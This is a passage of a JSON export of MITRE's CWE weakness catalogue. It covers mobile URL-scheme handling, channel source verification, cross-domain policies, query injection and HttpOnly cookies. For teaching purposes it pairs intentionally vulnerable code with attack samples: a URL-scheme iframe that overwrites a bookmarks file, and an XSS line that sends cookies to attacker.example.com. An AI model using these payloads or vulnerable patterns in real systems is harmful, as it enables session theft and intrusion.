(BOOL)application:(UIApplication *)application handleOpenURL:(NSURL *)url {}","xhtml:br":"","xhtml:div":{"#text":"if (!url) {}NSString *action = [url host];if([action isEqualToString: @\\"replaceFileText\\"]) {}return YES;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"return NO;","attr":{"@_style":"margin-left:10px;"}},{"#text":"NSDictionary *dict = [self parseQueryStringExampleFunction:[url query]];FileObject *objectFile = [self writeToFile:[dict objectForKey: @\\"file\\"] withText:[dict objectForKey: @\\"text\\"]];","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//this function will write contents to a specified file"}],"xhtml:br":["","",""]}}},{"attr":{"@_Nature":"attack","@_Language":"HTML"},"xhtml:div":"<iframe src=\\"appscheme://replaceFileText?file=Bookmarks.dat&text=listOfMaliciousWebsites\\">"}]},{"attr":{"@_Demonstrative_Example_ID":"DX-109"},"Intro_Text":"These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){}","xhtml:i":"// Android","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (url.substring(0,14).equalsIgnoreCase(\\"examplescheme:\\")){}","xhtml:div":{"#text":"if(url.substring(14,25).equalsIgnoreCase(\\"getUserInfo\\")){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"writeDataToView(view, UserData);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return true;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"Objective-C"},"xhtml:div":{"#text":"-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{}","xhtml:i":"// iOS","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@\\"exampleScheme\\"]){}return YES;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@\\"specialFunction\\"]){}return NO;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UIWebView *webView = [self writeDataToView:[URL query]];","xhtml:br":["",""],"xhtml:i":"// Make data available back in webview."}}}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["A call into native code can then be initiated by passing parameters within the URL:","Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2013-5725","Description":"URL scheme has action replace which requires no user prompt and allows remote attackers to perform undesired actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5725"},{"Reference":"CVE-2013-5726","Description":"URL scheme has action follow and favorite which allows remote attackers to force user to perform undesired actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5726"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-938"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-01-14"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"940":{"attr":{"@_ID":"940","@_Name":"Improper Verification of Source of a Communication Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software establishes a communication channel to handle an incoming request that has been initiated by an actor, but it does not properly verify that the request is coming from the expected origin.","Extended_Description":"When an attacker can successfully establish a communication channel from an untrusted origin, the attacker may be able to gain privileges and access unexpected functionality.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Varies by Context"],"Note":"An attacker can access any functionality that is inadvertently accessible to the source."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":["Use a mechanism that can validate the identity of the source, such as a certificate, and validate the integrity of data to ensure that it cannot be modified in transit using an Adversary-in-the-Middle (AITM) attack.","When designing functionality of actions in the URL scheme, consider whether the action should be accessible to all mobile applications, or if an allowlist of applications to interface with is appropriate."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-112"},"Intro_Text":"This Android application will remove a user account when it receives an intent to do so:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.RemoveUser\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class DeleteReceiver extends BroadcastReceiver {}","xhtml:br":["","","",""],"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"int userID = intent.getIntExtra(\\"userID\\");destroyUserData(userID);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},"Body_Text":"This application does not check the origin of the intent, thus allowing any malicious application to remove a user. Always check the origin of an intent, or create an allowlist of trusted applications using the manifest.xml file."},{"attr":{"@_Demonstrative_Example_ID":"DX-109"},"Intro_Text":"These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){}","xhtml:i":"// Android","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (url.substring(0,14).equalsIgnoreCase(\\"examplescheme:\\")){}","xhtml:div":{"#text":"if(url.substring(14,25).equalsIgnoreCase(\\"getUserInfo\\")){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"writeDataToView(view, UserData);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return true;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"Objective-C"},"xhtml:div":{"#text":"-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{}","xhtml:i":"// iOS","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@\\"exampleScheme\\"]){}return YES;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@\\"specialFunction\\"]){}return NO;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UIWebView *webView = [self writeDataToView:[URL query]];","xhtml:br":["",""],"xhtml:i":"// Make data available back in webview."}}}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["A call into native code can then be initiated by passing parameters within the URL:","Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1218","Description":"DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1218"},{"Reference":"CVE-2005-0877","Description":"DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0877"},{"Reference":"CVE-2001-1452","Description":"DNS server caches glue records received from non-delegated name servers","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1452"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"594"}},{"attr":{"@_CAPEC_ID":"595"}},{"attr":{"@_CAPEC_ID":"596"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-324"}}},"Notes":{"Note":{"#text":"While many access control issues involve authenticating the user, this weakness is more about authenticating the actual source of the communication channel itself; there might not be any \\"user\\" in such cases.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-02-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}]}},"941":{"attr":{"@_ID":"941","@_Name":"Incorrectly Specified Destination in a Communication Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software creates a communication channel to initiate an outgoing request to an actor, but it does not correctly specify the intended destination for that actor.","Extended_Description":{"xhtml:p":["Attackers at the destination may be able to spoof trusted servers to steal data or cause a denial of service.","There are at least two distinct weaknesses that can cause the software to communicate with an unintended destination:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["If the software allows an attacker to control which destination is specified, then the attacker can cause it to connect to an untrusted or malicious destination. For example, because UDP is a connectionless protocol, UDP packets can be spoofed by specifying a false source address in the packet; when the server receives the packet and sends a reply, it will specify a destination by using the source of the incoming packet - i.e., the false source. The server can then be tricked into sending traffic to the wrong host, which is effective for hiding the real source of an attack and for conducting a distributed denial of service (DDoS). As another example, server-side request forgery (SSRF) and XML External Entity (XXE) can be used to trick a server into making outgoing requests to hosts that cannot be directly accessed by the attacker due to firewall restrictions.","If the software incorrectly specifies the destination, then an attacker who can control this destination might be able to spoof trusted servers. While the most common occurrence is likely due to misconfiguration by an administrator, this can be resultant from other weaknesses. For example, the software might incorrectly parse an e-mail or IP address and send sensitive data to an unintended destination. As another example, an Android application may use a \\"sticky broadcast\\" to communicate with a receiver for a particular application, but since sticky broadcasts can be processed by *any* receiver, this can allow a malicious application to access restricted data that was only intended for a different application."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"406","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-113"},"Intro_Text":"This code listens on a port for DNS requests and sends the result to the requesting address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.bind( (UDP_IP,UDP_PORT) )while true:","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"data = sock.recvfrom(1024)if not data:(requestIP, nameToResolve) = parseUDPpacket(data)record = resolveName(nameToResolve)sendResponse(requestIP,record)","xhtml:br":["","","",""],"xhtml:div":{"#text":"break","attr":{"@_style":"margin-left:10px;"}}}}}},"Body_Text":"This code sends a DNS record to a requesting IP address. UDP allows the source IP address to be easily changed (\'spoofed\'), thus allowing an attacker to redirect responses to a target, which may be then be overwhelmed by the network traffic."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2013-5211","Description":"composite: NTP feature generates large responses (high amplification factor) with spoofed UDP source addresses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211"},{"Reference":"CVE-1999-0513","Description":"Classic \\"Smurf\\" attack, using spoofed ICMP packets to broadcast addresses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0513"},{"Reference":"CVE-1999-1379","Description":"DNS query with spoofed source address causes more traffic to be returned to spoofed address than was sent by the attacker.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1379"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-941"}},{"attr":{"@_External_Reference_ID":"REF-942"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-02-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"942":{"attr":{"@_ID":"942","@_Name":"Permissive Cross-domain Policy with Untrusted Domains","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a cross-domain policy file that includes domains that should not be trusted.","Extended_Description":{"xhtml:p":["A cross-domain policy file (\\"crossdomain.xml\\" in Flash and \\"clientaccesspolicy.xml\\" in Silverlight) defines a list of domains from which a server is allowed to make cross-domain requests. When making a cross-domain request, the Flash or Silverlight client will first look for the policy file on the target server. If it is found, and the domain hosting the application is explicitly allowed to make requests, the request is made.","Therefore, if a cross-domain policy file includes domains that should not be trusted, such as when using wildcards, then the application could be attacked by these untrusted domains.","An overly permissive policy file allows many of the same attacks seen in Cross-Site Scripting (CWE-79). Once the user has executed a malicious Flash or Silverlight application, they are vulnerable to a variety of attacks. The attacker could transfer private information, such as cookies that may include session information, from the victim\'s machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site.","In many cases, the attack can be launched without the victim even being aware of it."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"183","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Read Application Data","Varies by Context"],"Note":"An attacker may be able to bypass the web browser\'s same-origin policy. An attacker can exploit the weakness to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running ActiveX controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":"Avoid using wildcards in the cross-domain policy file. Any domain matching the wildcard expression will be implicitly trusted, and can perform two-way interaction with the target server."},{"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"For Flash, modify crossdomain.xml to use meta-policy options such as \'master-only\' or \'none\' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server."},{"Phase":["Architecture and Design","Operation"],"Strategy":"Attack Surface Reduction","Description":"For Flash, modify crossdomain.xml to use meta-policy options such as \'master-only\' or \'none\' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"These cross-domain policy files mean to allow Flash and Silverlight applications hosted on other domains to access its data:","Body_Text":["Flash crossdomain.xml :","Silverlight clientaccesspolicy.xml :","These entries are far too permissive, allowing any Flash or Silverlight application to send requests. A malicious application hosted on any other web site will be able to send requests on behalf of any user tricked into executing it."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<cross-domain-policy xmlns:xsi=\\"http://www.w3.org/2001/XMLSchema-instance\\"xsi:noNamespaceSchemaLocation=\\"http://www.adobe.com/xml/schemas/PolicyFile.xsd\\"><allow-access-from domain=\\"*.example.com\\"/><allow-access-from domain=\\"*\\"/></cross-domain-policy>","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<?xml version=\\"1.0\\" encoding=\\"utf-8\\"?><access-policy><cross-domain-access><policy><allow-from http-request-headers=\\"SOAPAction\\"><domain uri=\\"*\\"/></allow-from><grant-to><resource path=\\"/\\" include-subpaths=\\"true\\"/></grant-to></policy></cross-domain-access></access-policy>","xhtml:br":["","","","","","","","","","","",""]}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2012-2292","Description":"Product has a Silverlight cross-domain policy that does not restrict access to another application, which allows remote attackers to bypass the Same Origin Policy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2292"},{"Reference":"CVE-2014-2049","Description":"The default Flash Cross Domain policies in a product allows remote attackers to access user files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2049"},{"Reference":"CVE-2007-6243","Description":"Chain: Adobe Flash Player does not sufficiently restrict the interpretation and usage of cross-domain policy files, which makes it easier for remote attackers to conduct cross-domain and cross-site scripting (XSS) attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6243"},{"Reference":"CVE-2008-4822","Description":"Chain: Adobe Flash Player and earlier does not properly interpret policy files, which allows remote attackers to bypass a non-root domain policy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4822"},{"Reference":"CVE-2010-3636","Description":"Chain: Adobe Flash Player does not properly handle unspecified encodings during the parsing of a cross-domain policy file, which allows remote web servers to bypass intended access restrictions via unknown vectors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3636"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-943"}},{"attr":{"@_External_Reference_ID":"REF-944"}},{"attr":{"@_External_Reference_ID":"REF-945"}},{"attr":{"@_External_Reference_ID":"REF-946"}},{"attr":{"@_External_Reference_ID":"REF-947"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-06-05","Submission_Comment":"Created by MITRE with input from members of the CWE-Research mailing list."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Name"}],"Previous_Entry_Name":{"#text":"Overly Permissive Cross-domain Whitelist","attr":{"@_Date":"2020-02-26"}}}},"943":{"attr":{"@_ID":"943","@_Name":"Improper Neutralization of Special Elements in Data Query Logic","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query.","Extended_Description":{"xhtml:p":["Depending on the capabilities of the query language, an attacker could inject additional logic into the query to:","The ability to execute additional commands or change which entities are returned has obvious risks. But when the application logic depends on the order or number of entities, this can also lead to vulnerabilities. For example, if the application query expects to return only one entity that specifies an administrative user, but an attacker can change which entities are returned, this could cause the logic to return information for a regular user and incorrectly assume that the user has administrative privileges.","While this weakness is most commonly associated with SQL injection, there are many other query languages that are also subject to injection attacks, including HTSQL, LDAP, DQL, XQuery, Xpath, and \\"NoSQL\\" languages."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Modify the intended selection criteria, thus changing which data entities (e.g., records) are returned, modified, or otherwise manipulated","Append additional commands to the query","Return more entities than intended","Return fewer entities than intended","Cause entities to be sorted in an unexpected way"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Bypass Protection Mechanism","Read Application Data","Modify Application Data","Varies by Context"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-2503","Description":"Injection using Documentum Query Language (DQL)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2503"},{"Reference":"CVE-2014-2508","Description":"Injection using Documentum Query Language (DQL)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2508"}]},"Notes":{"Note":{"#text":"It could be argued that data query languages are effectively a command language - albeit with a limited set of commands - and thus any query-language injection issue could be treated as a child of CWE-74. However, CWE-943 is intended to better organize query-oriented issues to separate them from fully-functioning programming languages, and also to provide a more precise identifier for the many query languages that do not have their own CWE identifier.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-06-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"1004":{"attr":{"@_ID":"1004","@_Name":"Sensitive Cookie Without \'HttpOnly\' Flag","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.","Extended_Description":"The HttpOnly flag directs compatible browsers to prevent client-side script from accessing cookies. Including the HttpOnly flag in the Set-Cookie HTTP response header helps mitigate the risk associated with Cross-Site Scripting (XSS) where an attacker\'s script code might attempt to read the contents of a cookie and exfiltrate information obtained. When set, browsers that support the flag will not reveal the contents of the cookie to a third party via client-side script executed via XSS.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"An HTTP cookie is a small piece of data attributed to a specific website and stored on the user\'s computer by the user\'s web browser. This data can be leveraged for a variety of purposes including saving information entered into form fields, recording user activity, and for authentication purposes. Cookies used to save or record information generated by the user are accessed and modified by script code embedded in a web page. While cookies used for authentication are created by the website\'s server and sent to the user to be attached to future requests. These authentication cookies are often not meant to be accessed by the web page sent to the user, and are instead just supposed to be attached to future requests to verify authentication details."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties."},{"Scope":"Integrity","Impact":"Gain Privileges or Assume Identity","Note":"If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Leverage the HttpOnly flag when setting a sensitive cookie in a response.","Effectiveness":"High","Effectiveness_Notes":"While this mitigation is effective for protecting cookies from a browser\'s own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, a cookie is used to store a session ID for a client\'s interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.","Body_Text":["The snippet of code below establishes a new cookie to hold the sessionID.","The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:","When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.","To mitigate the risk, use the setHttpOnly(true) method."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String sessionID = generateSessionId();Cookie c = new Cookie(\\"session_id\\", sessionID);response.addCookie(c);","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"document.write(\'<img src=\\"http://attacker.example.com/collect-cookies?cookie=\' + document.cookie . \'\\">\'"},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"String sessionID = generateSessionId();Cookie c = new Cookie(\\"session_id\\", sessionID);c.setHttpOnly(true);response.addCookie(c);","xhtml:br":["","",""]}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-3852","Description":"CMS written in Python does not include the HTTPOnly flag in a Set-Cookie header, allowing remote attackers to obtain potentially sensitive information via script access to this cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3852"},{"Reference":"CVE-2015-4138","Description":"Appliance for managing encrypted communications does not use HttpOnly flag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4138"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-2"}},{"attr":{"@_External_Reference_ID":"REF-3"}},{"attr":{"@_External_Reference_ID":"REF-4"}},{"attr":{"@_External_Reference_ID":"REF-5"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2017-01-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"1007":{"attr":{"@_ID":"1007","@_Name":"Insufficient Visual Distinction of Homoglyphs Presented to User","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software displays information or identifiers to a user, but the display mechanism does not make it easy for the user to distinguish between visually similar or identical glyphs (homoglyphs), which may cause the user to misinterpret a glyph and perform an unintended, insecure action.","Extended_Description":{"xhtml:p":["Some glyphs, pictures, or 